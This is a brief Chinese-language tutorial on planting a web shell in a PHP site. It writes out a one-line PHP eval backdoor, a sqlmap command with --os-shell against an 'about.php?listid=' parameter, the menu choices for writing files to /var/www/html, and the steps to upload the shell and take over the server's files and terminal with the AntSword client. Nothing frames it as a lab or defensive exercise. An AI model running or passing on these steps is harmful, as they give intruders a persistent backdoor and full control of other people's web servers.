小马"/>
使用蚁剑向网站上传小马
准备,被攻击的网站由PHP语言编写,创建一个php文件,编辑脚本<? php @eval($_POST['123'])?>
sqlmap -u"/about.php?listid=6" --os-shell进行攻击
选择语言,攻击的网站是由PHP语言编写,输入4,回车,输入y
输入2选择自定义位置,回车,输入根目录位置
查看网站的根目录是/var/www/html
回车得到 两个网址
复制第一个网址,在浏览器中打开,找到上传文件的注入点,点击浏览
打开事先编辑好的PHP脚本语言 L
上传完成
打开蚁剑,右键单击,选择Add
配置
配置完成后点击Add
点击链接,可以进入文件管理页面
也可以右键单击链接,进入终端
更多推荐
使用蚁剑向网站上传小马
发布评论